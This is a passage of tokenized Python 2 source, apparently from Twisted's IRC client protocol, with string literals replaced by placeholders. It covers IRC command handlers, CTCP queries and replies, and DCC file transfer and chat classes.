( self , prefix , params ) : <EOL> """<STR_LIT>""" <EOL> nick = string . split ( prefix , '<STR_LIT:!>' ) [ <NUM_LIT:0> ] <EOL> channel = params [ - <NUM_LIT:1> ] <EOL> if nick == self . nickname : <EOL> self . joined ( channel ) <EOL> else : <EOL> self . userJoined ( nick , channel ) <EOL> def irc_PART ( self , prefix , params ) : <EOL> """<STR_LIT>""" <EOL> nick = string . split ( prefix , '<STR_LIT:!>' ) [ <NUM_LIT:0> ] <EOL> channel = params [ <NUM_LIT:0> ] <EOL> if nick == self . nickname : <EOL> self . left ( channel ) <EOL> else : <EOL> self . userLeft ( nick , channel ) <EOL> def irc_QUIT ( self , prefix , params ) : <EOL> """<STR_LIT>""" <EOL> nick = string . split ( prefix , '<STR_LIT:!>' ) [ <NUM_LIT:0> ] <EOL> self . userQuit ( nick , params [ <NUM_LIT:0> ] ) <EOL> def irc_MODE ( self , user , params ) : <EOL> """<STR_LIT>""" <EOL> channel , modes , args = params [ <NUM_LIT:0> ] , params [ <NUM_LIT:1> ] , params [ <NUM_LIT:2> : ] <EOL> if modes [ <NUM_LIT:0> ] not in '<STR_LIT>' : <EOL> modes = '<STR_LIT:+>' + modes <EOL> if channel == self . nickname : <EOL> paramModes = self . getUserModeParams ( ) <EOL> else : <EOL> paramModes = self . getChannelModeParams ( ) <EOL> try : <EOL> added , removed = parseModes ( modes , args , paramModes ) <EOL> except IRCBadModes : <EOL> log . err ( None , '<STR_LIT>' <EOL> '<STR_LIT>' % ( '<STR_LIT:U+0020>' . join ( params ) , ) ) <EOL> else : <EOL> if added : <EOL> modes , params = zip ( * added ) <EOL> self . modeChanged ( user , channel , True , '<STR_LIT>' . join ( modes ) , params ) <EOL> if removed : <EOL> modes , params = zip ( * removed ) <EOL> self . modeChanged ( user , channel , False , '<STR_LIT>' . join ( modes ) , params ) <EOL> def irc_PING ( self , prefix , params ) : <EOL> """<STR_LIT>""" <EOL> self . sendLine ( "<STR_LIT>" % params [ - <NUM_LIT:1> ] ) <EOL> def irc_PRIVMSG ( self , prefix , params ) : <EOL> """<STR_LIT>""" <EOL> user = prefix <EOL> channel = params [ <NUM_LIT:0> ] <EOL> message = params [ - <NUM_LIT:1> ] <EOL> if not message : <EOL> return <EOL> if message [ <NUM_LIT:0> ] == X_DELIM : <EOL> m = ctcpExtract ( message ) <EOL> if m [ '<STR_LIT>' ] : <EOL> self . ctcpQuery ( user , channel , m [ '<STR_LIT>' ] ) <EOL> if not m [ '<STR_LIT>' ] : <EOL> return <EOL> message = string . join ( m [ '<STR_LIT>' ] , '<STR_LIT:U+0020>' ) <EOL> self . privmsg ( user , channel , message ) <EOL> def irc_NOTICE ( self , prefix , params ) : <EOL> """<STR_LIT>""" <EOL> user = prefix <EOL> channel = params [ <NUM_LIT:0> ] <EOL> message = params [ - <NUM_LIT:1> ] <EOL> if message [ <NUM_LIT:0> ] == X_DELIM : <EOL> m = ctcpExtract ( message ) <EOL> if m [ '<STR_LIT>' ] : <EOL> self . ctcpReply ( user , channel , m [ '<STR_LIT>' ] ) <EOL> if not m [ '<STR_LIT>' ] : <EOL> return <EOL> message = string . join ( m [ '<STR_LIT>' ] , '<STR_LIT:U+0020>' ) <EOL> self . noticed ( user , channel , message ) <EOL> def irc_NICK ( self , prefix , params ) : <EOL> """<STR_LIT>""" <EOL> nick = string . split ( prefix , '<STR_LIT:!>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> if nick == self . nickname : <EOL> self . nickChanged ( params [ <NUM_LIT:0> ] ) <EOL> else : <EOL> self . userRenamed ( nick , params [ <NUM_LIT:0> ] ) <EOL> def irc_KICK ( self , prefix , params ) : <EOL> """<STR_LIT>""" <EOL> kicker = string . split ( prefix , '<STR_LIT:!>' ) [ <NUM_LIT:0> ] <EOL> channel = params [ <NUM_LIT:0> ] <EOL> kicked = params [ <NUM_LIT:1> ] <EOL> message = params [ - <NUM_LIT:1> ] <EOL> if string . lower ( kicked ) == string . lower ( self . nickname ) : <EOL> self . kickedFrom ( channel , kicker , message ) <EOL> else : <EOL> self . userKicked ( kicked , channel , kicker , message ) <EOL> def irc_TOPIC ( self , prefix , params ) : <EOL> """<STR_LIT>""" <EOL> user = string . split ( prefix , '<STR_LIT:!>' ) [ <NUM_LIT:0> ] <EOL> channel = params [ <NUM_LIT:0> ] <EOL> newtopic = params [ <NUM_LIT:1> ] <EOL> self . topicUpdated ( user , channel , newtopic ) <EOL> def irc_RPL_TOPIC ( self , prefix , params ) : <EOL> """<STR_LIT>""" <EOL> user = string . split ( prefix , '<STR_LIT:!>' ) [ <NUM_LIT:0> ] <EOL> channel = params [ <NUM_LIT:1> ] <EOL> newtopic = params [ <NUM_LIT:2> ] <EOL> self . topicUpdated ( user , channel , newtopic ) <EOL> def irc_RPL_NOTOPIC ( self , prefix , params ) : <EOL> user = string . split ( prefix , '<STR_LIT:!>' ) [ <NUM_LIT:0> ] <EOL> channel = params [ <NUM_LIT:1> ] <EOL> newtopic = "<STR_LIT>" <EOL> self . topicUpdated ( user , channel , newtopic ) <EOL> def irc_RPL_MOTDSTART ( self , prefix , params ) : <EOL> if params [ - <NUM_LIT:1> ] . startswith ( "<STR_LIT>" ) : <EOL> params [ - <NUM_LIT:1> ] = params [ - <NUM_LIT:1> ] [ <NUM_LIT:2> : ] <EOL> self . motd = [ params [ - <NUM_LIT:1> ] ] <EOL> def irc_RPL_MOTD ( self , prefix , params ) : <EOL> if params [ - <NUM_LIT:1> ] . startswith ( "<STR_LIT>" ) : <EOL> params [ - <NUM_LIT:1> ] = params [ - <NUM_LIT:1> ] [ <NUM_LIT:2> : ] <EOL> if self . motd is None : <EOL> self . motd = [ ] <EOL> self . motd . append ( params [ - <NUM_LIT:1> ] ) <EOL> def irc_RPL_ENDOFMOTD ( self , prefix , params ) : <EOL> """<STR_LIT>""" <EOL> motd = self . motd <EOL> self . motd = None <EOL> self . receivedMOTD ( motd ) <EOL> def irc_RPL_CREATED ( self , prefix , params ) : <EOL> self . created ( params [ <NUM_LIT:1> ] ) <EOL> def irc_RPL_YOURHOST ( self , prefix , params ) : <EOL> self . yourHost ( params [ <NUM_LIT:1> ] ) <EOL> def irc_RPL_MYINFO ( self , prefix , params ) : <EOL> info = params [ <NUM_LIT:1> ] . split ( None , <NUM_LIT:3> ) <EOL> while len ( info ) < <NUM_LIT:4> : <EOL> info . append ( None ) <EOL> self . myInfo ( * info ) <EOL> def irc_RPL_BOUNCE ( self , prefix , params ) : <EOL> self . bounce ( params [ <NUM_LIT:1> ] ) <EOL> def irc_RPL_ISUPPORT ( self , prefix , params ) : <EOL> args = params [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> self . supported . parse ( args ) <EOL> self . isupport ( args ) <EOL> def irc_RPL_LUSERCLIENT ( self , prefix , params ) : <EOL> self . luserClient ( params [ <NUM_LIT:1> ] ) <EOL> def irc_RPL_LUSEROP ( self , prefix , params ) : <EOL> try : <EOL> self . luserOp ( int ( params [ <NUM_LIT:1> ] ) ) <EOL> except ValueError : <EOL> pass <EOL> def irc_RPL_LUSERCHANNELS ( self , prefix , params ) : <EOL> try : <EOL> self . luserChannels ( int ( params [ <NUM_LIT:1> ] ) ) <EOL> except ValueError : <EOL> pass <EOL> def irc_RPL_LUSERME ( self , prefix , params ) : <EOL> self . luserMe ( params [ <NUM_LIT:1> ] ) <EOL> def irc_unknown ( self , prefix , command , params ) : <EOL> pass <EOL> def ctcpQuery ( self , user , channel , messages ) : <EOL> """<STR_LIT>""" <EOL> seen = set ( ) <EOL> for tag , data in messages : <EOL> method = getattr ( self , '<STR_LIT>' % tag , None ) <EOL> if tag not in seen : <EOL> if method is not None : <EOL> method ( user , channel , data ) <EOL> else : <EOL> self . ctcpUnknownQuery ( user , channel , tag , data ) <EOL> seen . add ( tag ) <EOL> def ctcpUnknownQuery ( self , user , channel , tag , data ) : <EOL> """<STR_LIT>""" <EOL> log . msg ( '<STR_LIT>' % ( user , tag , data ) ) <EOL> def ctcpQuery_ACTION ( self , user , channel , data ) : <EOL> self . action ( user , channel , data ) <EOL> def ctcpQuery_PING ( self , user , channel , data ) : <EOL> nick = string . split ( user , "<STR_LIT:!>" ) [ <NUM_LIT:0> ] <EOL> self . ctcpMakeReply ( nick , [ ( "<STR_LIT>" , data ) ] ) <EOL> def ctcpQuery_FINGER ( self , user , channel , data ) : <EOL> if data is not None : <EOL> self . quirkyMessage ( "<STR_LIT>" <EOL> % ( user , data ) ) <EOL> if not self . fingerReply : <EOL> return <EOL> if callable ( self . fingerReply ) : <EOL> reply = self . fingerReply ( ) <EOL> else : <EOL> reply = str ( self . fingerReply ) <EOL> nick = string . split ( user , "<STR_LIT:!>" ) [ <NUM_LIT:0> ] <EOL> self . ctcpMakeReply ( nick , [ ( '<STR_LIT>' , reply ) ] ) <EOL> def ctcpQuery_VERSION ( self , user , channel , data ) : <EOL> if data is not None : <EOL> self . quirkyMessage ( "<STR_LIT>" <EOL> % ( user , data ) ) <EOL> if self . versionName : <EOL> nick = string . split ( user , "<STR_LIT:!>" ) [ <NUM_LIT:0> ] <EOL> self . ctcpMakeReply ( nick , [ ( '<STR_LIT>' , '<STR_LIT>' % <EOL> ( self . versionName , <EOL> self . versionNum or '<STR_LIT>' , <EOL> self . versionEnv or '<STR_LIT>' ) ) ] ) <EOL> def ctcpQuery_SOURCE ( self , user , channel , data ) : <EOL> if data is not None : <EOL> self . quirkyMessage ( "<STR_LIT>" <EOL> % ( user , data ) ) <EOL> if self . sourceURL : <EOL> nick = string . split ( user , "<STR_LIT:!>" ) [ <NUM_LIT:0> ] <EOL> self . ctcpMakeReply ( nick , [ ( '<STR_LIT>' , self . sourceURL ) , <EOL> ( '<STR_LIT>' , None ) ] ) <EOL> def ctcpQuery_USERINFO ( self , user , channel , data ) : <EOL> if data is not None : <EOL> self . quirkyMessage ( "<STR_LIT>" <EOL> % ( user , data ) ) <EOL> if self . userinfo : <EOL> nick = string . split ( user , "<STR_LIT:!>" ) [ <NUM_LIT:0> ] <EOL> self . ctcpMakeReply ( nick , [ ( '<STR_LIT>' , self . userinfo ) ] ) <EOL> def ctcpQuery_CLIENTINFO ( self , user , channel , data ) : <EOL> """<STR_LIT>""" <EOL> nick = string . split ( user , "<STR_LIT:!>" ) [ <NUM_LIT:0> ] <EOL> if not data : <EOL> names = reflect . prefixedMethodNames ( self . __class__ , <EOL> '<STR_LIT>' ) <EOL> self . ctcpMakeReply ( nick , [ ( '<STR_LIT>' , <EOL> string . join ( names , '<STR_LIT:U+0020>' ) ) ] ) <EOL> else : <EOL> args = string . split ( data ) <EOL> method = getattr ( self , '<STR_LIT>' % ( args [ <NUM_LIT:0> ] , ) , None ) <EOL> if not method : <EOL> self . ctcpMakeReply ( nick , [ ( '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( data , args [ <NUM_LIT:0> ] ) ) ] ) <EOL> return <EOL> doc = getattr ( method , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . ctcpMakeReply ( nick , [ ( '<STR_LIT>' , doc ) ] ) <EOL> def ctcpQuery_ERRMSG ( self , user , channel , data ) : <EOL> nick = string . split ( user , "<STR_LIT:!>" ) [ <NUM_LIT:0> ] <EOL> self . ctcpMakeReply ( nick , [ ( '<STR_LIT>' , <EOL> "<STR_LIT>" % data ) ] ) <EOL> def ctcpQuery_TIME ( self , user , channel , data ) : <EOL> if data is not None : <EOL> self . quirkyMessage ( "<STR_LIT>" <EOL> % ( user , data ) ) <EOL> nick = string . split ( user , "<STR_LIT:!>" ) [ <NUM_LIT:0> ] <EOL> self . ctcpMakeReply ( nick , <EOL> [ ( '<STR_LIT>' , '<STR_LIT>' % <EOL> time . asctime ( time . localtime ( time . time ( ) ) ) ) ] ) <EOL> def ctcpQuery_DCC ( self , user , channel , data ) : <EOL> """<STR_LIT>""" <EOL> if not data : return <EOL> dcctype = data . split ( None , <NUM_LIT:1> ) [ <NUM_LIT:0> ] . upper ( ) <EOL> handler = getattr ( self , "<STR_LIT>" + dcctype , None ) <EOL> if handler : <EOL> if self . dcc_sessions is None : <EOL> self . dcc_sessions = [ ] <EOL> data = data [ len ( dcctype ) + <NUM_LIT:1> : ] <EOL> handler ( user , channel , data ) <EOL> else : <EOL> nick = string . split ( user , "<STR_LIT:!>" ) [ <NUM_LIT:0> ] <EOL> self . ctcpMakeReply ( nick , [ ( '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> % ( data , dcctype ) ) ] ) <EOL> self . quirkyMessage ( "<STR_LIT>" <EOL> % ( user , dcctype ) ) <EOL> def dcc_SEND ( self , user , channel , data ) : <EOL> data = text . splitQuoted ( data ) <EOL> if len ( data ) < <NUM_LIT:3> : <EOL> raise IRCBadMessage , "<STR_LIT>" % ( data , ) <EOL> ( filename , address , port ) = data [ : <NUM_LIT:3> ] <EOL> address = dccParseAddress ( address ) <EOL> try : <EOL> port = int ( port ) <EOL> except ValueError : <EOL> raise IRCBadMessage , "<STR_LIT>" % ( port , ) <EOL> size = - <NUM_LIT:1> <EOL> if len ( data ) >= <NUM_LIT:4> : <EOL> try : <EOL> size = int ( data [ <NUM_LIT:3> ] ) <EOL> except ValueError : <EOL> pass <EOL> self . dccDoSend ( user , address , port , filename , size , data ) <EOL> def dcc_ACCEPT ( self , user , channel , data ) : <EOL> data = text . splitQuoted ( data ) <EOL> if len ( data ) < <NUM_LIT:3> : <EOL> raise IRCBadMessage , "<STR_LIT>" % ( data , ) <EOL> ( filename , port , resumePos ) = data [ : <NUM_LIT:3> ] <EOL> try : <EOL> port = int ( port ) <EOL> resumePos = int ( resumePos ) <EOL> except ValueError : <EOL> return <EOL> self . dccDoAcceptResume ( user , filename , port , resumePos ) <EOL> def dcc_RESUME ( self , user , channel , data ) : <EOL> data = text . splitQuoted ( data ) <EOL> if len ( data ) < <NUM_LIT:3> : <EOL> raise IRCBadMessage , "<STR_LIT>" % ( data , ) <EOL> ( filename , port , resumePos ) = data [ : <NUM_LIT:3> ] <EOL> try : <EOL> port = int ( port ) <EOL> resumePos = int ( resumePos ) <EOL> except ValueError : <EOL> return <EOL> self . dccDoResume ( user , filename , port , resumePos ) <EOL> def dcc_CHAT ( self , user , channel , data ) : <EOL> data = text . splitQuoted ( data ) <EOL> if len ( data ) < <NUM_LIT:3> : <EOL> raise IRCBadMessage , "<STR_LIT>" % ( data , ) <EOL> ( filename , address , port ) = data [ : <NUM_LIT:3> ] <EOL> address = dccParseAddress ( address ) <EOL> try : <EOL> port = int ( port ) <EOL> except ValueError : <EOL> raise IRCBadMessage , "<STR_LIT>" % ( port , ) <EOL> self . dccDoChat ( user , channel , address , port , data ) <EOL> def dccDoSend ( self , user , address , port , fileName , size , data ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def dccDoResume ( self , user , file , port , resumePos ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def dccDoAcceptResume ( self , user , file , port , resumePos ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def dccDoChat ( self , user , channel , address , port , data ) : <EOL> pass <EOL> def ctcpMakeReply ( self , user , messages ) : <EOL> """<STR_LIT>""" <EOL> self . notice ( user , ctcpStringify ( messages ) ) <EOL> def ctcpMakeQuery ( self , user , messages ) : <EOL> """<STR_LIT>""" <EOL> self . msg ( user , ctcpStringify ( messages ) ) <EOL> def ctcpReply ( self , user , channel , messages ) : <EOL> """<STR_LIT>""" <EOL> for m in messages : <EOL> method = getattr ( self , "<STR_LIT>" % m [ <NUM_LIT:0> ] , None ) <EOL> if method : <EOL> method ( user , channel , m [ <NUM_LIT:1> ] ) <EOL> else : <EOL> self . ctcpUnknownReply ( user , channel , m [ <NUM_LIT:0> ] , m [ <NUM_LIT:1> ] ) <EOL> def ctcpReply_PING ( self , user , channel , data ) : <EOL> nick = user . split ( '<STR_LIT:!>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> if ( not self . _pings ) or ( not self . _pings . has_key ( ( nick , data ) ) ) : <EOL> raise IRCBadMessage , "<STR_LIT>" % ( user , data ) <EOL> t0 = self . _pings [ ( nick , data ) ] <EOL> self . pong ( user , time . time ( ) - t0 ) <EOL> def ctcpUnknownReply ( self , user , channel , tag , data ) : <EOL> """<STR_LIT>""" <EOL> log . msg ( "<STR_LIT>" <EOL> % ( user , tag , data ) ) <EOL> def badMessage ( self , line , excType , excValue , tb ) : <EOL> """<STR_LIT>""" <EOL> log . msg ( line ) <EOL> log . msg ( string . join ( traceback . format_exception ( excType , <EOL> excValue , <EOL> tb ) , '<STR_LIT>' ) ) <EOL> def quirkyMessage ( self , s ) : <EOL> """<STR_LIT>""" <EOL> log . msg ( s + '<STR_LIT:\n>' ) <EOL> def connectionMade ( self ) : <EOL> self . supported = ServerSupportedFeatures ( ) <EOL> self . _queue = [ ] <EOL> if self . performLogin : <EOL> self . register ( self . nickname ) <EOL> def dataReceived ( self , data ) : <EOL> basic . LineReceiver . dataReceived ( self , data . replace ( '<STR_LIT:\r>' , '<STR_LIT>' ) ) <EOL> def lineReceived ( self , line ) : <EOL> line = lowDequote ( line ) <EOL> try : <EOL> prefix , command , params = parsemsg ( line ) <EOL> if command in numeric_to_symbolic : <EOL> command = numeric_to_symbolic [ command ] <EOL> self . handleCommand ( command , prefix , params ) <EOL> except IRCBadMessage : <EOL> self . badMessage ( line , * sys . exc_info ( ) ) <EOL> def getUserModeParams ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def getChannelModeParams ( self ) : <EOL> """<STR_LIT>""" <EOL> params = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> prefixes = self . supported . getFeature ( '<STR_LIT>' , { } ) <EOL> params [ <NUM_LIT:0> ] = params [ <NUM_LIT:1> ] = '<STR_LIT>' . join ( prefixes . iterkeys ( ) ) <EOL> chanmodes = self . supported . getFeature ( '<STR_LIT>' ) <EOL> if chanmodes is not None : <EOL> params [ <NUM_LIT:0> ] += chanmodes . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> params [ <NUM_LIT:0> ] += chanmodes . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> params [ <NUM_LIT:1> ] = params [ <NUM_LIT:0> ] <EOL> params [ <NUM_LIT:0> ] += chanmodes . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return params <EOL> def handleCommand ( self , command , prefix , params ) : <EOL> """<STR_LIT>""" <EOL> method = getattr ( self , "<STR_LIT>" % command , None ) <EOL> try : <EOL> if method is not None : <EOL> method ( prefix , params ) <EOL> else : <EOL> self . irc_unknown ( prefix , command , params ) <EOL> except : <EOL> log . deferr ( ) <EOL> def __getstate__ ( self ) : <EOL> dct = self . __dict__ . copy ( ) <EOL> dct [ '<STR_LIT>' ] = None <EOL> dct [ '<STR_LIT>' ] = None <EOL> return dct <EOL> def dccParseAddress ( address ) : <EOL> if '<STR_LIT:.>' in address : <EOL> pass <EOL> else : <EOL> try : <EOL> address = long ( address ) <EOL> except ValueError : <EOL> raise IRCBadMessage , "<STR_LIT>" % ( address , ) <EOL> else : <EOL> address = ( <EOL> ( address >> <NUM_LIT> ) & <NUM_LIT> , <EOL> ( address >> <NUM_LIT:16> ) & <NUM_LIT> , <EOL> ( address >> <NUM_LIT:8> ) & <NUM_LIT> , <EOL> address & <NUM_LIT> , <EOL> ) <EOL> address = '<STR_LIT:.>' . join ( map ( str , address ) ) <EOL> return address <EOL> class DccFileReceiveBasic ( protocol . Protocol , styles . Ephemeral ) : <EOL> """<STR_LIT>""" <EOL> bytesReceived = <NUM_LIT:0> <EOL> def __init__ ( self , resumeOffset = <NUM_LIT:0> ) : <EOL> self . bytesReceived = resumeOffset <EOL> self . resume = ( resumeOffset != <NUM_LIT:0> ) <EOL> def dataReceived ( self , data ) : <EOL> """<STR_LIT>""" <EOL> self . bytesReceived = self . bytesReceived + len ( data ) <EOL> self . transport . write ( struct . pack ( '<STR_LIT>' , self . bytesReceived ) ) <EOL> class DccSendProtocol ( protocol . Protocol , styles . Ephemeral ) : <EOL> """<STR_LIT>""" <EOL> blocksize = <NUM_LIT> <EOL> file = None <EOL> bytesSent = <NUM_LIT:0> <EOL> completed = <NUM_LIT:0> <EOL> connected = <NUM_LIT:0> <EOL> def __init__ ( self , file ) : <EOL> if type ( file ) is types . StringType : <EOL> self . file = open ( file , '<STR_LIT:r>' ) <EOL> def connectionMade ( self ) : <EOL> self . connected = <NUM_LIT:1> <EOL> self . sendBlock ( ) <EOL> def dataReceived ( self , data ) : <EOL> bytesShesGot = struct . unpack ( "<STR_LIT>" , data ) <EOL> if bytesShesGot < self . bytesSent : <EOL> return <EOL> elif bytesShesGot > self . bytesSent : <EOL> self . transport . loseConnection ( ) <EOL> return <EOL> self . sendBlock ( ) <EOL> def sendBlock ( self ) : <EOL> block = self . file . read ( self . blocksize ) <EOL> if block : <EOL> self . transport . write ( block ) <EOL> self . bytesSent = self . bytesSent + len ( block ) <EOL> else : <EOL> self . transport . loseConnection ( ) <EOL> self . completed = <NUM_LIT:1> <EOL> def connectionLost ( self , reason ) : <EOL> self . connected = <NUM_LIT:0> <EOL> if hasattr ( self . file , "<STR_LIT>" ) : <EOL> self . file . close ( ) <EOL> class DccSendFactory ( protocol . Factory ) : <EOL> protocol = DccSendProtocol <EOL> def __init__ ( self , file ) : <EOL> self . file = file <EOL> def buildProtocol ( self , connection ) : <EOL> p = self . protocol ( self . file ) <EOL> p . factory = self <EOL> return p <EOL> def fileSize ( file ) : <EOL> """<STR_LIT>""" <EOL> size = None <EOL> if hasattr ( file , "<STR_LIT>" ) : <EOL> fileno = file . fileno ( ) <EOL> try : <EOL> stat_ = os . fstat ( fileno ) <EOL> size = stat_ [ stat . ST_SIZE ] <EOL> except : <EOL> pass <EOL> else : <EOL> return size <EOL> if hasattr ( file , "<STR_LIT:name>" ) and path . exists ( file . name ) : <EOL> try : <EOL> size = path . getsize ( file . name ) <EOL> except : <EOL> pass <EOL> else : <EOL> return size <EOL> if hasattr ( file , "<STR_LIT>" ) and hasattr ( file , "<STR_LIT>" ) : <EOL> try : <EOL> try : <EOL> file . seek ( <NUM_LIT:0> , <NUM_LIT:2> ) <EOL> size = file . tell ( ) <EOL> finally : <EOL> file . seek ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> except : <EOL> pass <EOL> else : <EOL> return size <EOL> return size <EOL> class DccChat ( basic . LineReceiver , styles . Ephemeral ) : <EOL> """<STR_LIT>""" <EOL> queryData = None <EOL> delimiter = CR + NL <EOL> client = None <EOL> remoteParty = None <EOL> buffer = "<STR_LIT>" <EOL> def __init__ ( self , client , queryData = None ) : <EOL> """<STR_LIT>""" <EOL> self . client = client <EOL> if queryData : <EOL> self . queryData = queryData <EOL> self . remoteParty = self . queryData [ <NUM_LIT:0> ] <EOL> def dataReceived ( self , data ) : <EOL> self . buffer = self . buffer + data <EOL> lines = string . split ( self . buffer , LF ) <EOL> self . buffer = lines . pop ( ) <EOL> for line in lines : <EOL> if line [ - <NUM_LIT:1> ] == CR : <EOL> line = line [ : - <NUM_LIT:1> ] <EOL> self . lineReceived ( line ) <EOL> def lineReceived ( self , line ) : <EOL> log . msg ( "<STR_LIT>" % ( self . remoteParty , line ) ) <EOL> self . client . privmsg ( self . remoteParty , <EOL> self . client . nickname , line ) <EOL> class DccChatFactory ( protocol . ClientFactory ) : <EOL> protocol = DccChat <EOL> noisy = <NUM_LIT:0> <EOL> def __init__ ( self , client , queryData ) : <EOL> self . client = client <EOL> self . queryData = queryData <EOL> def buildProtocol ( self , addr ) : <EOL> p = self . protocol ( client = self . client , queryData = self . queryData ) <EOL> p . factory = self <EOL> return p <EOL> def clientConnectionFailed ( self , unused_connector , unused_reason ) : <EOL> self . client . dcc_sessions . remove ( self ) <EOL> def clientConnectionLost ( self , unused_connector , unused_reason ) : <EOL> self . client . dcc_sessions . remove ( self ) <EOL> def dccDescribe ( data ) : <EOL> """<STR_LIT>""" <EOL> orig_data = data <EOL> data = string . split ( data ) <EOL> if len ( data ) < <NUM_LIT:4> : <EOL> return orig_data <EOL> ( dcctype , arg , address , port ) = data [ : <NUM_LIT:4> ] <EOL> if '<STR_LIT:.>' in address : <EOL> pass <EOL> else : <EOL> try : <EOL> address = long ( address ) <EOL> except ValueError : <EOL> pass <EOL> else : <EOL> address = ( <EOL> ( address >> <NUM_LIT> ) & <NUM_LIT> , <EOL> ( address >> <NUM_LIT:16> ) & <NUM_LIT> , <EOL> ( address >> <NUM_LIT:8> ) & <NUM_LIT> , <EOL> address & <NUM_LIT> , <EOL> ) <EOL> address = string . join ( map ( str , map ( int , address ) ) , "<STR_LIT:.>" ) <EOL> if dcctype == '<STR_LIT>' : <EOL> filename = arg <EOL> size_txt = '<STR_LIT>' <EOL> if len ( data ) >= <NUM_LIT:5> : <EOL> try : <EOL> size = int ( data [ <NUM_LIT:4> ] ) <EOL> size_txt = '<STR_LIT>' % ( size , ) <EOL> except ValueError : <EOL> pass <EOL> dcc_text = ( "<STR_LIT>" <EOL> % ( filename , size_txt , address , port ) ) <EOL> elif dcctype == '<STR_LIT>' : <EOL> dcc_text = ( "<STR_LIT>" <EOL> % ( address , port ) ) <EOL> else : <EOL> dcc_text = orig_data <EOL> return dcc_text <EOL> class DccFileReceive ( DccFileReceiveBasic ) : <EOL> """<STR_LIT>""" <EOL> filename = '<STR_LIT>' <EOL> fileSize = - <NUM_LIT:1> <EOL> destDir = '<STR_LIT:.>' <EOL> overwrite = <NUM_LIT:0> <EOL> fromUser = None <EOL> queryData = None <EOL> def __init__ ( self , filename , fileSize = - <NUM_LIT:1> , queryData = None , <EOL> destDir = '<STR_LIT:.>' , resumeOffset = <NUM_LIT:0> ) : <EOL> DccFileReceiveBasic . __init__ ( self , resumeOffset = resumeOffset ) <EOL> self . filename = filename <EOL> self . destDir = destDir <EOL> self . fileSize = fileSize <EOL> if queryData : <EOL> self . queryData = queryData <EOL> self . fromUser = self . queryData [ <NUM_LIT:0> ] <EOL> def set_directory ( self , directory ) : <EOL> """<STR_LIT>""" <EOL> if not path . exists ( directory ) : <EOL> raise OSError ( errno . ENOENT , "<STR_LIT>" , <EOL> directory ) <EOL> if not path . isdir ( directory ) : <EOL> raise OSError ( errno . ENOTDIR , "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> directory ) <EOL> if not os . access ( directory , os . X_OK | os . W_OK ) : <EOL> raise OSError ( errno . EACCES , <EOL> "<STR_LIT>" , <EOL> directory ) <EOL> self . destDir = directory <EOL> def set_filename ( self , filename ) : <EOL> """<STR_LIT>""" <EOL> self . filename = filename <EOL> def set_overwrite ( self , boolean ) : <EOL> """<STR_LIT>""" <EOL> self . overwrite = boolean <EOL> def connectionMade ( self ) : <EOL> dst = path . abspath ( path . join ( self . destDir , self . filename ) ) <EOL> exists = path . exists ( dst ) <EOL> if self . resume and exists : <EOL> self . file = open ( dst , '<STR_LIT>' ) <EOL> log . msg ( "<STR_LIT>" % <EOL> ( self . file , self . file . tell ( ) ) ) <EOL> elif self . overwrite or not exists : <EOL> self . file = open ( dst , '<STR_LIT:wb>' ) <EOL> else : <EOL> raise OSError ( errno . EEXIST , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> dst ) <EOL> def dataReceived ( self , data ) : <EOL> self . file . write ( data ) <EOL> DccFileReceiveBasic . dataReceived ( self , data ) <EOL> def connectionLost ( self , reason ) : <EOL> """<STR_LIT>""" <EOL> self . connected = <NUM_LIT:0> <EOL> logmsg = ( "<STR_LIT>" % ( self , ) ) <EOL> if self . fileSize > <NUM_LIT:0> : <EOL> logmsg = ( "<STR_LIT>" <EOL> % ( logmsg , self . bytesReceived , self . fileSize ) ) <EOL> if self . bytesReceived == self . fileSize : <EOL> pass <EOL> elif self . bytesReceived < self . fileSize : <EOL> logmsg = ( "<STR_LIT>" <EOL> % ( logmsg , self . fileSize - self . bytesReceived ) ) <EOL> else : <EOL> logmsg = ( "<STR_LIT>" <EOL> % ( logmsg , ) ) <EOL> else : <EOL> logmsg = ( "<STR_LIT>" <EOL> % ( logmsg , self . bytesReceived ) ) <EOL> if hasattr ( self , '<STR_LIT:file>' ) : <EOL> logmsg = "<STR_LIT>" % ( logmsg , self . file . name ) <EOL> if hasattr ( self . file , '<STR_LIT>' ) : self . file . close ( ) <EOL> def __str__ ( self ) : <EOL> if not self . connected : <EOL> return "<STR_LIT>" % ( id ( self ) , ) <EOL> from_ = self . transport . getPeer ( ) <EOL> if self . fromUser : <EOL> from_ = "<STR_LIT>" % ( self . fromUser , from_ ) <EOL> s = ( "<STR_LIT>" % ( self . filename , from_ ) ) <EOL> return s <EOL> def __repr__ ( self ) : <EOL> s = ( "<STR_LIT>" <EOL> % ( self . __class__ , id ( self ) , self . filename ) ) <EOL> return s <EOL> X_DELIM = chr ( <NUM_LIT> <NUM_LIT:1> ) <EOL> def ctcpExtract ( message ) : <EOL> """<STR_LIT>""" <EOL> extended_messages = [ ] <EOL> normal_messages = [ ] <EOL> retval = { '<STR_LIT>' : extended_messages , <EOL> '<STR_LIT>' : normal_messages } <EOL> messages = string . split ( message , X_DELIM ) <EOL> odd = <NUM_LIT:0> <EOL> while messages : <EOL> if odd : <EOL> extended_messages . append ( messages . pop ( <NUM_LIT:0> ) ) <EOL> else : <EOL> normal_messages . append ( messages . pop ( <NUM_LIT:0> ) ) <EOL> odd = not odd <EOL> extended_messages [ : ] = filter ( None , extended_messages ) <EOL> normal_messages [ : ] = filter ( None , normal_messages ) <EOL> extended_messages [ : ] = map ( ctcpDequote , extended_messages ) <EOL> for i in xrange ( len ( extended_messages ) ) : <EOL> m = string . split ( extended_messages [ i ] , SPC , <NUM_LIT:1> ) <EOL> tag = m [ 